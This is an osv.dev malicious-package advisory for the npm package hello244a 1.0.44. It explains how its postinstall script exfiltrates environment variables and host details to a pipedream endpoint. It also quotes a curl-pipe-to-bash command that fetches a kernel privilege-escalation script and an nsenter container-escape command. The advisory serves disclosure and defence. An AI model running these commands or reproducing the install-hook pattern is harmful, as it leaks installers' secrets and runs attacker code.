hello244a @1.0.44
Vulnerability report · Last retrieved from osv.dev July 6, 2026 at 10:15 AM UTC
OSV ID
MAL-2026-5188
Ecosystem
npm
Summary
package.json declares a postinstall script that, on npm install, (1) enumerates process.env plus os.hostname(), os.platform(), os.arch(), and whoami output, base64-encodes the collected data, and issues an HTTP GET to a hardcoded pipedream request-bin at http://eodxy50gl486xrx.m.pipedream.net/, exfiltrating installer environment variables and host identity to an attacker-controlled endpoint over cleartext HTTP; (2) on Linux, executes curl -s https://raw.githubusercontent.com/Akabe1/akabe1.github.io/master/_posts/exploits/cve-2021-22555/exploit.sh | bash , fetching and running an unpinned third-party shell script referencing a known Linux kernel local-privilege-escalation CVE; (3) attempts container/sandbox escape via nsenter --mount=/proc/1/ns/mnt -- /bin/sh on Linux and docker exec against running containers on Windows, with results reported back to the same pipedream endpoint. Behavior fires automatically on npm install with no user interaction. Installer harm is concrete: environment variables (which routinely contain credentials, tokens, and CI secrets) plus host identity are leaked to the attacker, and arbitrary attacker-controlled code executes in the installer's user context with privilege-escalation and container-escape attempts.
Source: amazon-inspector (e9bc9153129c6d11cd92a3d5bf7f772d768196014df7a42897d137d6da954085)
Protect your entire dependency tree
Scan your lock files automatically on every PR. Block malicious packages before they reach production.